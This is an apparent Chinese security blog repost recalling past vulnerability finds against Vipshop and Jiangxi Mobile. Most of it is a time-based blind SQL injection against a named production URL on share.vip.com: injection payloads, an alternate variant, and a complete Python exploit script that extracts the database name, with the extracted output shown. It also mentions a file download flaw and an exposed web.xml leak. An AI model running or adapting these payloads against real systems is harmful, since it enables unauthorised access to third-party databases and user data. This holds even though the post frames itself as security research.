这个1024夜晚不孤单,回顾我们以前挖过的洞~

admin
admin
admin
138635
文章
114
评论
2021年7月25日23:33:57评论73 views字数 1097阅读3分39秒阅读模式

1.唯品会某系统文件下载

这个1024夜晚不孤单,回顾我们以前挖过的洞~
这个1024夜晚不孤单,回顾我们以前挖过的洞~

这个1024夜晚不孤单,回顾我们以前挖过的洞~


2.唯品会某分站SQL注入漏洞

#1 注入点

http://share.vip.com/Acts/SetCount?id=63200

#2 PAYLOAD, 5秒后打开网页

http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP(5)))RING) and 'RING'='RING

#3 基于时间差注入

code 区域 
(SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING)

#* 另一种注入方式

code 区域 
http://share.vip.com/Acts/SetCount?id=63200' and if((1=2),1,(select 1 union select 2))#


漏洞证明:

#4 EXP

code 区域 
#!/usr/bin/env python
# encoding: utf-8
# vip_new.py 
# [email protected]

import requests
import time
import sys

reload(sys)
sys.setdefaultencoding('utf-8')

payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')

for i in range(1,20):
     for _str in payloads:
         start_time = time.time()
         url = "http://share.vip.com/Acts/SetCount?id=63200' AND (SELECT * FROM (SELECT(SLEEP((ASCII(MID(LOWER(DATABASE())," + str(i) + ",1))=" + str(ord(_str)) + ")*5)))RING) AND 'RING'='RING"
         result = requests.get(url).text
         if(time.time() - start_time) > 3:
             print _str
             break

#5 注入证明

code 区域 
database()
vipshop_share
user()
[email protected].***


3.江西移动网厅信息泄露

这个1024夜晚不孤单,回顾我们以前挖过的洞~

漏洞证明:

http://**.**.**.**/ecare/web.xml

这个1024夜晚不孤单,回顾我们以前挖过的洞~




本文始发于微信公众号(飓风网络安全):这个1024夜晚不孤单,回顾我们以前挖过的洞~

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年7月25日23:33:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   这个1024夜晚不孤单,回顾我们以前挖过的洞~https://cn-sec.com/archives/359551.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息